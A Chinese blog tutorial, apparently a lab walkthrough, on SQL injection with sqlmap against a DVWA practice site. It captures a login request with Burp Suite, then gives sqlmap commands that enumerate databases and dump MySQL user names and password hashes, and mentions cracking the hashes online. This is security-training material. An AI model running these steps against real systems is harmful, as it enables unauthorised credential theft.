环境工具
PS:sqlmap工具安装请查看get注入的blog
https://blog.youkuaiyun.com/qq_45833260/article/details/125657568?spm=1001.2014.3001.5502
使用phpstudy搭建的DVWA靶场-暴力破解(low级别)
sqlmap
攻击步骤
一、获取并保存数据包
- 选择暴力破解,输入用户名,密码随便输,burpsuite抓包(虽然此处是get请求方式,但不影响后面的攻击,也可以右键改成post方式)
- 在数据包右键选择copy to file,保存数据包为post.txt
二、sqlmap注入攻击
PS:将post.txt移动到和sqlmap.py同一目录下,或者写入绝对路径
1.获取数据库信息
python sqlmap.py -r post.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数
2.获取MySQL数据库中的表
python sqlmap.py -r post.txt -p username -D mysql --tables
3.获取user表中的字段
python sqlmap.py -r post.txt -p username -D mysql -T user --columns
8.0版本的user表里,没有password字段,取而代之的是authentication_string。所以需要设置密码时,应该操作此字段。
4.获取用户名和密码
python sqlmap.py -r post.txt -p username -D mysql -T user -C “User,authentication_string” --dump
可以看到密码解密为root
也可以用在线的md5对密文进行解密 https://www.cmd5.com/
总结
本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。